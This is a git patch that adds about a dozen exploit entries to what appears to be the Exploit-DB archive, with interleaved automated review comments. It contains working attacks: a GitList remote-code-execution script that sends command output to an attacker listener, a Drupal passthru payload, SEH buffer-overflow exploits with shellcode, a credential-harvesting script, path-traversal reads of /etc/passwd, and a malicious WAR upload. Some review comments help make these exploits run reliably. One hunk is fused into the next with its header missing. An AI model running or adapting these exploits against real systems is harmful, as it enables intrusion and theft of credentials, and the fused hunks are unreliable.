From b1f00227f1f9307de1b3651cb5314029aa713f14 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Fri, 27 Apr 2018 05:01:49 +0000 Subject: [PATCH] DB: 2018-04-27 12 changes to exploits/shellcodes Free Download Manager 2.0 Built 417 - Local Buffer Overflow (SEH) Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH) Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow Shopy Point of Sale v1.0 - CSV Injection Shopy Point of Sale 1.0 - CSV Injection Drupal < 7.58 - 'drupalgeddon3' Authenticated Remote Code Execution (PoC) Blog Master Pro v1.0 - CSV Injection HRSALE The Ultimate HRM v1.0.2 - CSV Injection HRSALE The Ultimate HRM v1.0.2 - 'award_id' SQL Injection Blog Master Pro 1.0 - CSV Injection HRSALE The Ultimate HRM 1.0.2 - CSV Injection HRSALE The Ultimate HRM 1.0.2 - 'award_id' SQL Injection HRSALE The Ultimate HRM v1.0.2 - Local File Inclusion HRSALE The Ultimate HRM 1.0.2 - Local File Inclusion Jfrog Artifactory < 4.16 - Unauthenticated Arbitrary File Upload / Remote Command Execution WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response October CMS User Plugin 1.4.5 - Persistent Cross-Site Scripting MyBB Threads to Link Plugin 1.3 - Cross-Site Scripting GitList 0.6 - Unauthenticated Remote Code Execution TP-Link Technologies TL-WA850RE Wi-Fi Range Extender - Unauthenticated Remote Reboot Frog CMS 0.9.5 - Persistent Cross-Site Scripting --- exploits/hardware/webapps/44550.txt | 22 ++++++ exploits/linux/webapps/44543.txt | 108 ++++++++++++++++++++++++++++ exploits/linux/webapps/44545.py | 99 +++++++++++++++++++++++++ exploits/php/webapps/44542.txt | 18 +++++ exploits/php/webapps/44544.php | 23 ++++++ exploits/php/webapps/44546.txt | 20 ++++++ exploits/php/webapps/44547.txt | 31 ++++++++ exploits/php/webapps/44548.py | 100 ++++++++++++++++++++++++++ exploits/php/webapps/44551.txt | 38 ++++++++++ exploits/windows/local/44549.py | 48 +++++++++++++ exploits/windows/remote/31694.py | 2 +- exploits/windows_x86/local/44499.py | 56 
+++++++++++++++ files_exploits.csv | 23 ++++-- 13 files changed, 581 insertions(+), 7 deletions(-) create mode 100644 exploits/hardware/webapps/44550.txt create mode 100644 exploits/linux/webapps/44543.txt create mode 100755 exploits/linux/webapps/44545.py create mode 100644 exploits/php/webapps/44542.txt create mode 100644 exploits/php/webapps/44544.php create mode 100644 exploits/php/webapps/44546.txt create mode 100644 exploits/php/webapps/44547.txt create mode 100755 exploits/php/webapps/44548.py create mode 100644 exploits/php/webapps/44551.txt create mode 100755 exploits/windows/local/44549.py create mode 100755 exploits/windows_x86/local/44499.py diff --git a/exploits/hardware/webapps/44550.txt b/exploits/hardware/webapps/44550.txt new file mode 100644 index 000000000..9f36e6077 --- /dev/null +++ b/exploits/hardware/webapps/44550.txt @@ -0,0 +1,22 @@ +# Exploit Title: TP-Link Technologies TL-WA850RE Wi-Fi Range Extender | Unauthorized Remote Reboot +# Date: 25/04/2018 +# Exploit Author: Wadeek +# Vendor Homepage: https://www.tp-link.com/ +# Firmware Link: https://www.tp-link.com/en/download/TL-WA850RE.html +# Category: dos + +1. www.shodan.io (with title "Opening...") + +"HTTP/1.1 200 OK" "Server: TP-LINK HTTPD/1.0" "COOKIE=" + +2. Proof of Concept + + +:System Log: +/data/systemlog.txt?operation=save + +:Encrypted Configuration File: +/data/config.bin?operation=backup + +:Reboot: +curl --silent 'http://[IP]/data/reboot.json' -H 'Host: [IP]' -H 'Accept: application/json, text/javascript, */*;' --compressed -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Cookie: COOKIE=' -H 'Connection: keep-alive' --data 'operation=write' \ No newline at end of file diff --git a/exploits/linux/webapps/44543.txt b/exploits/linux/webapps/44543.txt new file mode 100644 index 000000000..172d72b89 --- /dev/null +++ b/exploits/linux/webapps/44543.txt 
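Review bot: The title and the `# Category: dos` header describe only the reboot, yet the PoC section also lists `/data/systemlog.txt?operation=save` and `/data/config.bin?operation=backup` as reachable with the same empty `COOKIE=` cookie, which is an unauthenticated information-disclosure issue the advisory never names; the file header (`Unauthorized Remote Reboot`) and the CSV row (`Unauthenticated Remote Reboot`) also disagree on wording. I would align the header with the CSV title and add, after `# Category:`, a line such as `# Note: the system-log and configuration-backup endpoints listed below are also served without authentication; treat this as information disclosure as well as DoS.` A remediation line (keep the management interface off untrusted networks; check the vendor firmware page linked above for an update) would help readers coming from the CVE-less index entry.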
@@ -0,0 +1,108 @@ +# Exploit Title: Jfrog Artifactory < 4.16 - Unauthenticated Arbitrary File Upload / Remote Command Execution +# Date: 2018-04-25 +# Exploit Author: Alessio Sergi +# Vendor Homepage: https://jfrog.com/artifactory/ +# Software Link: https://bintray.com/jfrog/artifactory/download_file?file_path=jfrog-artifactory-oss-4.15.0.zip +# CVE : CVE-2016-10036 + +Jfrog Artifactory < 4.16 is vulnerable to unauthenticated arbitrary file upload and directory traversal vulnerabilities. +The vulnerabilities are within the upload api "/artifactory/ui/artifact/upload", require that "Allow Anonymous Access" is enabled (as it is on a default installation) and can be abused to create or overwrite files on the server. Specifically, it is possible to create or overwrite any files inside the application folder (scenario 1) or deploy a new application (scenario 2) and execute arbitrary code on the server. + + +Scenario 1: It is possible to modify the html files of the application just by executing an http post request like the one below, which exploits a directory traversal vulnerability on the parameter "filename" to insert the javascript code "" within the file app.html : + +****** + +POST /artifactory/ui/artifact/upload HTTP/1.1 +Host: [removed] +User-Agent: [removed] +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Length: 1749 +Content-Type: multipart/form-data; boundary=---------------------------6085305491255810029929874687 +Connection: close + +-----------------------------6085305491255810029929874687 +Content-Disposition: form-data; name="file"; filename="../../../tomcat/webapps/artifactory/webapp/app.html" +Content-Type: application/zip + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +-----------------------------6085305491255810029929874687-- + +****** + +(It is also possible to exploit this vulnerability to create JSP 
files within the application folder, but the tomcat used by Artifactory on a default installation won't execute them.) + + + +Scenario 2: + +It is possible to exploit the same vulnerability to deploy a malicious servlet application on the tomcat server and obtain remote code execution: + +****** + +POST /artifactory/ui/artifact/upload HTTP/1.1 +Host: [removed] +User-Agent: [removed] +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Length: 3515 +Content-Type: multipart/form-data; boundary=---------------------------6085305491255810029929874687 +Connection: close + +-----------------------------6085305491255810029929874687 +Content-Disposition: form-data; name="file"; filename="../../../tomcat/webapps/malicious-servlet.war" +Content-Type: application/zip + +PK��3[--SNIP--] +WEB-INF/lib/PK������r��> ���� + +-----------------------------6085305491255810029929874687-- + +****** \ No newline at end of file diff --git a/exploits/linux/webapps/44545.py b/exploits/linux/webapps/44545.py new file mode 100755 index 000000000..937df2fa4 --- /dev/null +++ b/exploits/linux/webapps/44545.py 
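Review bot: The advisory states the precondition (`Allow Anonymous Access` enabled, which it says is the default) but gives no remediation beyond the `< 4.16` in the title, and the javascript code quoted in scenario 1 appears blank in this rendering (most likely stripped markup rather than an omission, but worth checking the committed file). I would add a short `Fix:` block after the `# CVE :` line — upgrade to 4.16 or later, and as an interim mitigation disable anonymous access so `/artifactory/ui/artifact/upload` requires authentication — and note that the `../../../tomcat/...` depth shown is specific to the default install layout. For detection, a multipart upload whose `filename` field contains `../` is the concrete indicator this entry should call out.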
@@ -0,0 +1,99 @@ +# Exploit Title: SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response +# Date: 2018-04-01 +# Exploit Author: Sven Fassbender +# Vendor Homepage: https://sickrage.github.io +# Software Link: https://github.com/SickRage/SickRage +# Version: < v2018.03.09-1 +# CVE : CVE-2018-9160 +# Category: webapps + +#1. Background information + +"SickRage is an automatic Video Library Manager for TV Shows. +It watches for new episodes of your favourite shows, and when they are posted it does its magic: +automatic torrent/nzb searching, downloading, and processing at the qualities you want." --extract from https://sickrage.github.io + +#2. Vulnerability description + +SickRage returns clear-text credentials for e.g. GitHub, AniDB, Kodi, Plex etc. in HTTP responses. +Prerequisite is that the user did not set a username and password for their SickRage installation. (not enforced, default) + +HTTP request: +GET /config/general/ HTTP/1.1 +Host: 192.168.1.13:8081 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: de,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://192.168.1.13:8081/config/backuprestore/ +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 + + +HTTP response: +HTTP/1.1 200 OK +Content-Length: 113397 +Vary: Accept-Encoding +Server: TornadoServer/4.5.1 +Etag: "e5c29fe99abcd01731bec1afec0e618195f1ae37" +Date: Fri, 02 Mar 2018 10:47:51 GMT +Content-Type: text/html; charset=UTF-8 + + + + + + [...] + + [...] + + [...] + + + + +#3. 
Proof of Concept + +#!/usr/bin/env python +import urllib3 +import sys +import requests +from BeautifulSoup import BeautifulSoup + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) +init(autoreset=True) + +if __name__ == '__main__': + if len(sys.argv) != 3: + print "Usage: $ " + sys.argv[0] + " [IP_adress] [port]" + else: + host = sys.argv[1] + print "https://www.shodan.io/host/{0}".format(host) + port = sys.argv[2] + print "*** Get GitHub User credentials from SickRage ***" + url = "http://{0}:{1}/config/general".format(host, port) + response = requests.get(url, timeout=5) + parsed_html = BeautifulSoup(response.text) + try: + git_username = parsed_html.body.find('input', {'id': 'git_username'}).get("value") + git_password = parsed_html.body.find('input', {'id': 'git_password'}).get("value") + if str(git_password) != "None" and str(git_password) != "None": + if len(git_password) >= 1 and len(git_username) >= 1: + print str(git_username) + print str(git_password) + except AttributeError: + pass + + +#4. Timeline + +[2018-03-07] Vulnerability discovered +[2018-03-08] Vendor contacted +[2018-03-08] Vendor replied +[2018-03-09] Vulnerability fixed. (https://github.com/SickRage/SickRage/compare/v2018.02.26-2...v2018.03.09-1) + +#5. Recommendation + +Update the SickRage installation on v2018.03.09-1 or later. +Protect the access to the web application with proper user credentials. \ No newline at end of file diff --git a/exploits/php/webapps/44542.txt b/exploits/php/webapps/44542.txt new file mode 100644 index 000000000..82f578105 --- /dev/null +++ b/exploits/php/webapps/44542.txt 
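Review bot: `init(autoreset=True)` in the PoC is never imported (it looks like colorama's `init`), so the script raises NameError before it reaches the argument check; either add `from colorama import init` or drop the line, since nothing else uses colour output. The credential check tests `git_password` twice — `if str(git_password) != "None" and str(git_password) != "None":` should read `if str(git_username) != "None" and str(git_password) != "None":`. `urllib3.disable_warnings(...)` is also dead weight because the request goes to a plain `http://` URL, and the usage string has a typo (`IP_adress`).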
@@ -0,0 +1,18 @@ +This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602. + +You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm). + +POST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1 +[...] +form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN] + +Retrieve the form_build_id from the response, and then triggering the exploit with : + +POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1 +[...] +form_build_id=[FORM_BUILD_ID] + +This will display the result of the whoami command. + +Patch your systems! +Blaklis \ No newline at end of file diff --git a/exploits/php/webapps/44544.php b/exploits/php/webapps/44544.php new file mode 100644 index 000000000..c2e2d7fd2 --- /dev/null +++ b/exploits/php/webapps/44544.php @@ -0,0 +1,23 @@ +# Exploit Title: WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion +# Date: 2018-04-25 +# Exploit Author: Wadeek +# Software Link: https://downloads.wordpress.org/plugin/wp-with-spritz.zip +# Software Version: 1.0 +# Google Dork: intitle:("Spritz Login Success") AND inurl:("wp-with-spritz/wp.spritz.login.success.html") +# Tested on: Apache2 with PHP 7 on Linux +# Category: webapps + + +1. Version Disclosure + +/wp-content/plugins/wp-with-spritz/readme.txt + +2. Source Code + +if(isset($_GET['url'])){ +$content=file_get_contents($_GET['url']); + +3. Proof of Concept + +/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd +/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec \ No newline at end of file diff --git a/exploits/php/webapps/44546.txt b/exploits/php/webapps/44546.txt new file mode 100644 index 000000000..a7b7aaa32 --- /dev/null +++ b/exploits/php/webapps/44546.txt 
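Review bot: The file names only `SA-CORE-2018-004 / CVE-2018-7602` and gives no affected or fixed version, while the CSV row added in this commit titles it `Drupal < 7.58`; that range should be confirmed against the referenced advisory, since nothing in the PoC text supports it. I would add a header block in the style of the other entries (`# Exploit Title`, `# Date`, `# CVE : CVE-2018-7602`) plus a `# Fixed in: [VERSION_FROM_SA-CORE-2018-004]` line, and state explicitly that `[CSRF-TOKEN]` and `[FORM_BUILD_ID]` come from an authenticated session with node-delete permission, which the prose only implies.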
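Review bot: The title says `Remote File Inclusion`, but the two lines quoted under `2. Source Code` show `file_get_contents($_GET['url'])`, which reads the target rather than including it as PHP; unless the plugin later passes `$content` to `include`/`eval` (not visible here), this is arbitrary file read plus SSRF, and the index description should say so. The second PoC line (`url=http(s)://domain/exec`) does not on its own demonstrate code execution. I would add `# Fix: validate the url parameter against an allowlist of expected hosts/paths (or reject it); file_get_contents() will follow any scheme allow_url_fopen permits.` and a `# Vendor contacted:` line, which the header omits.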
@@ -0,0 +1,20 @@ +# Exploit Title: October CMS User Plugin v1.4.5 - Persistent Cross-Site Scripting +# Date: 2018-04-03 +# Author: 0xB9 +# Software Link: https://octobercms.com/plugin/rainlab-user +# Version: 1.4.5 +# Tested on: Ubuntu 17.10 +# CVE: CVE-2018-10366 + +#1. Description: +Front-end user management for October CMS. Allows visitors to create a website. + +#2. Proof of Concept: + +Persistent XSS +- Go to the account page localhost/OctoberCMS/account/ +- Register & enter the following for your full name

"> +- You will be alerted everytime you visit the account page localhost/OctoberCMS/account/ + +#3. Solution: +Update to 1.4.6 \ No newline at end of file diff --git a/exploits/php/webapps/44547.txt b/exploits/php/webapps/44547.txt new file mode 100644 index 000000000..358c842da --- /dev/null +++ b/exploits/php/webapps/44547.txt @@ -0,0 +1,31 @@ +# Exploit Title: MyBB Threads to Link Plugin v1.3 - Persistent XSS +# Date: 3/15/2018 +# Author: 0xB9 +# Contact: luxorforums.com/User-0xB9 or 0xB9[at]protonmail.com +# Software Link: https://community.mybb.com/mods.php?action=view&pid=1065 +# Version: v1.3 +# Tested on: Ubuntu 17.10 +CVE: CVE-2018-10365 + + +1. Description: +When editing a thread the user is given to the option to convert the thread to a link. + + +2. Proof of Concept: + +Persistent XSS +- Edit a thread or post you've made +- At the bottom of the edit page in the Thread Link box input the following "> +- Now visit the forum your thread/post exists in to see the alert. + + +3. Solution: +The plugin has since been removed after notifying the author. + +Patch in line 83: +$thread['tlink'] = ($thread['tlink']); + +to + +$thread['tlink'] = htmlspecialchars_uni($thread['tlink']); \ No newline at end of file diff --git a/exploits/php/webapps/44548.py b/exploits/php/webapps/44548.py new file mode 100755 index 000000000..5a548373e --- /dev/null +++ b/exploits/php/webapps/44548.py 
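Review bot: The `CVE: CVE-2018-10365` header line is missing the `# ` prefix every other header line uses, so tooling that parses the comment header will drop it; make it `# CVE: CVE-2018-10365`. The proposed patch (`htmlspecialchars_uni($thread['tlink'])` at line 83) is the right shape for output encoding, but if, as the plugin name suggests, the value ends up in an `href`, readers should be told that HTML escaping alone does not restrict the URL scheme — validating that the stored link is http/https is the complementary fix. The PoC payload appears blank in this rendering, which looks like stripped markup rather than an authoring error.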
@@ -0,0 +1,100 @@ +''' +# Exploit Title: GitList 0.6 Unauthenticated RCE +# Date: 25-04-2018 +# Software Link: https://github.com/klaussilveira/gitlist +# Exploit Author: Kacper Szurek +# Contact: https://twitter.com/KacperSzurek +# Website: https://security.szurek.pl/ +# Category: remote + +1. Description + +Bypass/Exploit `escapeshellarg` using argument injection: `git grep --open-files-in-pager=whoami`. + +More info about this technique: + +https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html + +2. Proof of Concept +''' + +import requests +from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer +import urlparse +import urllib +import threading +import time +import os +import re + +url = 'http://192.168.1.1/gitlist/' +command = 'id' +your_ip = '192.168.1.100' +your_port = 8001 + +print "GitList 0.6 Unauthenticated RCE" +print "by Kacper Szurek" +print "https://security.szurek.pl/" + +print "REMEMBER TO DISABLE FIREWALL" + +search_url = None +r = requests.get(url) +repos = re.findall(r'/([^/]+)/master/rss', r.text) + +if len(repos) == 0: + print "[-] No repos" + os._exit(0) + +for repo in repos: + print "[+] Found repo {}".format(repo) + r = requests.get("{}{}".format(url, repo)) + files = re.findall(r'href="[^\"]+blob/master/([^\"]+)"', r.text) + for file in files: + r = requests.get("{}{}/raw/master/{}".format(url, repo, file)) + print "[+] Found file {}".format(file) + print r.text[0:100] + search_url = "{}{}/tree/{}/search".format(url, repo, r.text[0:1]) + break + +if not search_url: + print "[-] No files in repo" + os._exit(0) + +print "[+] Search using {}".format(search_url) + +class GetHandler(BaseHTTPRequestHandler): + def do_GET(self): + parsed_path = urlparse.urlparse(self.path) + print "[+] Command response" + print urllib.unquote_plus(parsed_path.query).decode('utf8')[2:] + self.send_response(200) + self.end_headers() + self.wfile.write("OK") + os._exit(0) + + def log_message(self, format, *args): + return + +def 
exploit_server(): + server = HTTPServer((your_ip, your_port), GetHandler) + server.serve_forever() + +print "[+] Start server on {}:{}".format(your_ip, your_port) +t = threading.Thread(target=exploit_server) +t.daemon = True +t.start() +print "[+] Server started" + +r = requests.post(search_url, data={'query':'--open-files-in-pager=php -r "file_get_contents(\\"http://{}:{}/?a=\\".urlencode(shell_exec(\\"{}\\")));"'.format(your_ip, your_port, command)}) + +while True: + time.sleep(1) + +''' +3. Solution: + +Update to version 0.7.0 + +https://github.com/klaussilveira/gitlist/releases/tag/0.7.0 +''' \ No newline at end of file diff --git a/exploits/php/webapps/44551.txt b/exploits/php/webapps/44551.txt new file mode 100644 index 000000000..865be562e --- /dev/null +++ b/exploits/php/webapps/44551.txt 
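Review bot: None of the `requests.get`/`requests.post` calls pass a `timeout`, so a host that accepts the connection and stalls hangs the script forever; `requests.get(url, timeout=10)` (and likewise on the other three calls) is the minimal change. Exiting with `os._exit(0)` from inside `do_GET` skips interpreter cleanup and is a point of style — signalling the main `while True` loop instead would be the conventional shape — and `file` shadows the builtin. `r.text[0:1]` being used as the tree/ref segment of `search_url` deserves a comment, since it is not obvious why the first byte of a file's content is an acceptable ref. For defenders, the literal `--open-files-in-pager=` inside a search `query` parameter is the indicator to alert on, as the Description already notes.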
@@ -0,0 +1,38 @@ +# Exploit Title: Frog CMS 0.9.5 has a stored Cross Site Scripting Vulnerability via "Admin Site title" in Settings +# Date: 2018-04-23 +# Exploit Author: Wenming Jiang +# Vendor Homepage: https://github.com/philippe/FrogCMS +# Software Link: https://github.com/philippe/FrogCMS +# Version: 0.9.5 +# Tested on: php 5.6, apache2.2.29, macos 10.12.6 +# CVE :CVE-2018-10321 + + +Description: +Frog CMS 0.9.5 has a stored Cross Site Scripting Vulnerability when an attacker has access to Settings page, and enters the payload via "Admin Site title" in Settings. + + +Steps to replicate: +log into the system as an administrator role; +enter page: http://your_site/frogcms/admin/?/setting, and click Settings option; +navigate to "Admin Site title" section +enter payload as shown in below section: +Frog CMS1 +visit http://your_site/frogcms/admin/?/login, you will triage JavaScript execution + + + +Exploit Code: +Frog CMS1 + + +Impacts: +Anyone who visit the target page will be affected to triage JavaScript code, including administrator, editor, developer, and guest. + + +Affected Version: +0.9.5 + + +Affected URL: +http://your_site/frogcms/admin/?/login \ No newline at end of file diff --git a/exploits/windows/local/44549.py b/exploits/windows/local/44549.py new file mode 100755 index 000000000..5dd4dd694 --- /dev/null +++ b/exploits/windows/local/44549.py 
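Review bot: Unlike the other web entries in this batch, this file has no Solution/fix section, and the prerequisite — an administrator account with access to Settings — appears only in the description, not in the title or the CSV row, where 44538 uses `Authenticated` for the same situation. I would retitle to `Frog CMS 0.9.5 - Authenticated Persistent Cross-Site Scripting` in both the header and `files_exploits.csv`, and add `Solution: HTML-escape the site title wherever it is rendered (including the admin login page); no vendor fix is referenced.` The payload under `Exploit Code:` reads as plain `Frog CMS1` here, so its markup seems to have been lost in this rendering; the committed file should be checked.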
@@ -0,0 +1,48 @@ +####################################################### +# Exploit Title: Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH) +# Date: 25.04.2018 +# Exploit Author:T3jv1l +# Vendor Homepage:http://www.alloksoft.com/ +# Software: www.alloksoft.com/allok_avi2dvd.exe +# Category:Local +# Contact:https://twitter.com/T3jv1l +# Version: Allok AVI to DVD SVCD VCD Converter 4.0.1217 +# Tested on: Windows 7 SP1 x86 +# Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/ +############################################################# + +print""" +#1. Download and install the setup file +#2. Run this exploit code via python 2.7 +#3. A file "Evil.txt" will be created +#4. Copy the contents of the file (Evil.txt)and paste in the License Name field +#5. Click Register and BOMM !!!! """ + +import struct + + + +junk = "A" * 780 +nseh = "\x90\x90\xeb\x10" +seh = struct.pack(" Import > Import lists of downloads > open URL file that includes http://192.168.1.53:81 (HOST|Port changed according to your needs) + +#!/usr/bin/python + +from socket import * +from time import sleep + +host = "192.168.1.53" +port = 81 + +s = socket(AF_INET, SOCK_STREAM) +s.bind((host, port)) +s.listen(1) +print "\n[+] Listening on %d ..." 
% port + +cl, addr = s.accept() +print "[+] Connection accepted from %s" % addr[0] + +nseh = "\xeb\x88\x90\x90" #Short Jump backward 118bytes (jmp short 0xffffff8a) (more bytes can be jumped backwards depending on the shell code size required ) +seh = "\xd1\x9c\x4a\x00" #address to trigger POP-POP-RETURN sequence +# Evil produce a message box 113 bytes can be changed according to your needs +evil = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7" +payload = "\x43" * (1724-255) + "\x90" * 142 + evil + nseh + seh + +buffer = "HTTP/1.1 301 Moved Permanently\r\n" +buffer += "Date: Thu, 23 Feb 2018 10:21:08 GMT\r\n" +buffer += "Server: Apache/2.2.22 (Debian)\r\n" +buffer += "Location: "+ payload + "\r\n" +buffer += "Vary: Accept-Encoding\r\n" +buffer += "Content-Length: 8000\r\n" +buffer += "Keep-Alive: timeout=5, max=100\r\n" +buffer += "Connection: Keep-Alive\r\n" +buffer += "Content-Type: text/html; charset=iso-8859-1\r\n" +buffer += "\r\n" +buffer += "\n" +buffer += "\n" +buffer += "301 Moved Permanently\n" +buffer += "\n" +buffer += "

Moved Permanently

\n" +buffer += "

The document has moved here.

\n" +buffer += "\n" + +print cl.recv(1000) +cl.send(buffer) +print "[+] Sending buffer: OK\n" + +sleep(1) +cl.close() +s.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 915e15c9b..758fca217 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -9680,9 +9680,11 @@ id,file,description,date,author,type,platform,port 44478,exploits/windows_x86/local/44478.cpp,"Microsoft Window Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation",2018-03-26,xiaodaozhi,local,windows_x86, 44479,exploits/windows_x86/local/44479.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS17-017)",2018-03-15,xiaodaozhi,local,windows_x86, 44480,exploits/windows_x86/local/44480.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS16-039)",2018-03-01,xiaodaozhi,local,windows_x86, +44499,exploits/windows_x86/local/44499.py,"Free Download Manager 2.0 Built 417 - Local Buffer Overflow (SEH)",2018-04-23,"Marwan Shamel",local,windows_x86, 44516,exploits/windows/local/44516.py,"R 3.4.4 - Local Buffer Overflow",2018-04-24,bzyo,local,windows, 44518,exploits/windows/local/44518.py,"Allok Video to DVD Burner 2.6.1217 - Buffer Overflow (SEH)",2018-04-24,T3jv1l,local,windows, 44523,exploits/linux/local/44523.rb,"lastore-daemon D-Bus - Privilege Escalation (Metasploit)",2018-04-24,Metasploit,local,linux, +44549,exploits/windows/local/44549.py,"Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH)",2018-04-26,T3jv1l,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 
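Review bot: `s.bind((host, port))` is called without `SO_REUSEADDR`, so re-running the listener right after a test fails with address-in-use while the previous socket sits in TIME_WAIT; add `s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)` before the bind (the names are already in scope via `from socket import *`). The response also advertises `Content-Length: 8000` for a body that is visibly far shorter, which may leave a strict client waiting rather than acting on the redirect. Note that in this view the hunk is fused with the preceding 44549.py one — the `diff --git` header for `exploits/windows_x86/local/44499.py` is missing and 44549.py's `struct.pack(` line runs straight into this file's header comments — so the end of the 44549 hunk cannot be placed. From a detection standpoint, a 301 whose `Location` header carries over a kilobyte of repeated bytes is the observable artifact.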
@@ -14869,7 +14871,7 @@ id,file,description,date,author,type,platform,port
 31639,exploits/php/remote/31639.txt,"Trillian 3.1.9 - '.DTD' File XML Parser Buffer Overflow",2008-04-11,david130490,remote,php,
 31917,exploits/windows/remote/31917.rb,"Symantec Endpoint Protection Manager - Remote Command Execution (Metasploit)",2014-02-26,Metasploit,remote,windows,9090
 31689,exploits/windows/remote/31689.py,"HP Data Protector - EXEC_BAR Remote Command Execution",2014-02-16,"Chris Graham",remote,windows,5555
-31694,exploits/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad ELHarmeel",remote,windows,
+31694,exploits/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad Alharmeel",remote,windows,
 31695,exploits/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection (Metasploit)",2014-02-16,Metasploit,remote,php,
 31706,exploits/unix/remote/31706.txt,"IBM Lotus Expeditor 6.1 - URI Handler Command Execution",2008-04-24,"Thomas Pollet",remote,unix,
 31736,exploits/windows/remote/31736.py,"Ultra Mini HTTPd 1.21 - 'POST' Remote Stack Buffer Overflow (1)",2014-02-18,Sumit,remote,windows,80
@@ -39198,7 +39200,7 @@ id,file,description,date,author,type,platform,port
 44454,exploits/php/webapps/44454.txt,"Cobub Razor 0.8.0 - SQL injection",2018-04-16,Kyhvedn,webapps,php,80
 44469,exploits/jsp/webapps/44469.txt,"Sophos Cyberoam UTM CR25iNG - 10.6.3 MR-5 - Direct Object Reference",2018-04-16,Frogy,webapps,jsp,
 44471,exploits/php/webapps/44471.txt,"Joomla! Component jDownloads 3.2.58 - Cross Site Scripting",2018-04-17,"Sureshbabu Narvaneni",webapps,php,
-44534,exploits/php/webapps/44534.txt,"Shopy Point of Sale v1.0 - CSV Injection",2018-04-25,8bitsec,webapps,php,
+44534,exploits/php/webapps/44534.txt,"Shopy Point of Sale 1.0 - CSV Injection",2018-04-25,8bitsec,webapps,php,
 44483,exploits/php/webapps/44483.txt,"MySQL Squid Access Report 2.1.4 - SQL Injection / Cross-Site Scripting",2018-04-18,"Keerati T.",webapps,php,80
 44484,exploits/php/webapps/44484.txt,"Rvsitebuilder CMS - Database Backup Download",2018-04-18,"Hesam Bazvand",webapps,php,
 44486,exploits/php/webapps/44486.txt,"Match Clone Script 1.0.4 - Cross-Site Scripting",2018-04-18,ManhNho,webapps,php,80
@@ -39220,9 +39222,18 @@ id,file,description,date,author,type,platform,port
 44513,exploits/php/webapps/44513.py,"Interspire Email Marketer < 6.1.6 - Remote Admin Authentication Bypass",2018-04-24,devcoinfet,webapps,php,
 44515,exploits/php/webapps/44515.py,"Ericsson-LG iPECS NMS A.1Ac - Cleartext Credential Disclosure",2018-04-24,"Berk Cem Göksel",webapps,php,
 44520,exploits/php/webapps/44520.html,"WordPress Plugin Woo Import Export 1.0 - Arbitrary File Deletion",2018-04-24,"Lenon Leite",webapps,php,80
